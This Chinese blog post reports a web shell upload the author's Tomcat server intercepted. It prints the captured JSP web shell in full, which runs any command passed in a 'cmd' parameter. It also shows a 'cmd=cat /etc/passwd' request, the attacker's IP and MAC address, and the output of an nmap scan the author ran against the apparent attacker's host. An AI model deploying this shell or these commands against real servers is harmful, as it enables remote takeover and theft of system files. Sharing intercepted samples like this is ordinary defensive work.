本文主要是介绍网络安全之WebShell截获,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
不知道这是哪个大哥的手笔有没有认领的20240424十一点四十分左右
大哥计算机的具体信息贴上了,还好大哥没有put成功,返回405!
IP地址
31.49.67.43:36668
MAC地址
80:05:88:48:37:b5
- ToolB的MAC地址厂商信息查询网站:https://toolb.cn/mac-address
- WaveCN.com的以太网MAC地址查询工具:https://www.wavecn.com/mac.php
- MAC地址查询网站,提供根据网卡MAC地址查询厂商信息:https://mac.bmcx.com/
- ITOOL的MAC地址查询在线工具:https://itool.co/mac
- MiniWebtool的MAC地址查找工具:https://miniwebtool.com/zh-cn/mac-address-lookup/
- MAC地址查询方法网站:https://mac.chacd.com/
- Strerr.com的MAC地址查询,网卡OUI制造商查询:https://www.strerr.com/cn/mac-address-lookup.html
- LZLTool的MAC地址批量查询网站:https://www.lzltool.cn/mac
- DNSChecker的MAC地址查找工具:https://dnschecker.cloud/cn/mac-lookup.html
- BCZS的MAC查询,专业免费MAC地址网卡地址蓝牙地址查询:http://mac.bczs.net/
WEB攻击】SERVER-APACHE Apache Tomcat 远程jsp文件上传尝试
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " request.getParameter("cmd") "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
http://xxx.xxx.xxx.xxxx:xxxx/y021.jsp/
没上传成功别难受,祝你在其他地放也上传不成功!!
http://xxx.xxx.xxx.xxxx:xxxx/y021.jsp?cmd= cat+/etc/passwd
请求头分析
怎么回事,请求头也上代理吗?没必要,反正你也成功不了
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
这个大哥攻击成功了
http://120.77.82.232:8080/
但是开放了一些端口,就不干你了
C:\Users\hi>nmap -sV 120.77.82.232
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-24 15:26 中国标准时间
NSOCK ERROR [0.0770s] ssl_init_helper(): OpenSSL legacy provider failed to load.Nmap scan report for 120.77.82.232
Host is up (0.040s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
53/tcp closed domain
113/tcp closed ident
1080/tcp closed socks
1688/tcp open nsjtp-data?
3389/tcp closed ms-wbt-server
5566/tcp closed westec-connect
6000/tcp closed X11
8080/tcp open http SimpleHTTPServer 0.6 (Python 3.9.2)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1688-TCP:V=7.93%I=7%D=4/24%Time=6628B473%P=i686-pc-windows-windows%
SF:r(WMSRequest,20,"\x05\0\x03#\x10\0\0\0\x20\0\0\0\x02\0\0\0\x20\0\0\0\0\
SF:0\0\0\x03\0\x01\x1c\0\0\0\0");Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.27 seconds
这篇关于网络安全之WebShell截获的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!